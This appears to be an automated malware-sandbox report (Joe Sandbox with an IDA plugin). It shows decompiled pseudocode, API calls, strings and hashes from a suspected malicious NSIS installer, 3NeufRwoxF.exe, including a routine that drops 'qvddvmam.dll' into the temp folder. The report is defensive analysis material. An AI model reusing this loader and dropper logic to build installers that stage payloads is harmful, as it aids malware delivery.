0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x79
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(ytxithcebq,?,?,?,ytxithcebq,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\3NeufRwoxF.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,ytxithcebq,?,?,?,ytxithcebq,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(ytxithcebq), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
RichEd20, xrefs: 004037FC
_Nb, xrefs: 0040377C, 00403781
RichEdit, xrefs: 00403823
ytxithcebq, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
RichEd32, xrefs: 00403807
1033, xrefs: 00403603, 0040364F
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
RichEdit20A, xrefs: 00403814, 0040381A
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 004035EF
@6B, xrefs: 00403735
.DEFAULT\Control Panel\International, xrefs: 0040363F
.exe, xrefs: 004036CC

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\3NeufRwoxF.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ytxithcebq
API String ID: 914957316-3189361066
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\3NeufRwoxF.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x507f6
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x429b0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x44902
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3NeufRwoxF.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\3NeufRwoxF.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3NeufRwoxF.exe,C:\Users\user\Desktop\3NeufRwoxF.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
Null, xrefs: 00402D54
Inst, xrefs: 00402D42
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
Error launching installer, xrefs: 00402CAB
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 00402C68
C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
C:\Users\user\Desktop\3NeufRwoxF.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
soft, xrefs: 00402D4B

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\3NeufRwoxF.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3NeufRwoxF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2333471634
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
